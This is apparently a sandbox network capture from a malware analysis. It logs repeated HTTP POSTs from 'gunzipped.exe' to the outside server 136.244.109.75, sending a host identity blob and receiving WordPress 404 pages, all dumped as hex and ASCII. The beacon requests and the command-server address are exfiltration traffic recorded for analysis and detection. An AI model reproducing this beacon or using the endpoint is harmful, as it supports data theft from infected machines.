Apr 17, 2024 03:18:32.588629007 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:32.588668108 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:32.588706970 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:32.588748932 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:32.588788033 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:32.588828087 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:32.588869095 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:32.588907957 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:32.588951111 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	49780	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:32.922641039 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:33.126036882 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:34.054111004 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:33 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:34.054174900 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:34.054213047 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:34.054250956 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:34.054292917 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:34.054331064 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:34.054369926 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:34.054414988 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:34.054454088 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:34.054500103 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	49781	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:34.395591974 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:34.598916054 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:35.517859936 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:34 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:35.517924070 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:35.517962933 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:35.518002033 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:35.518043995 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
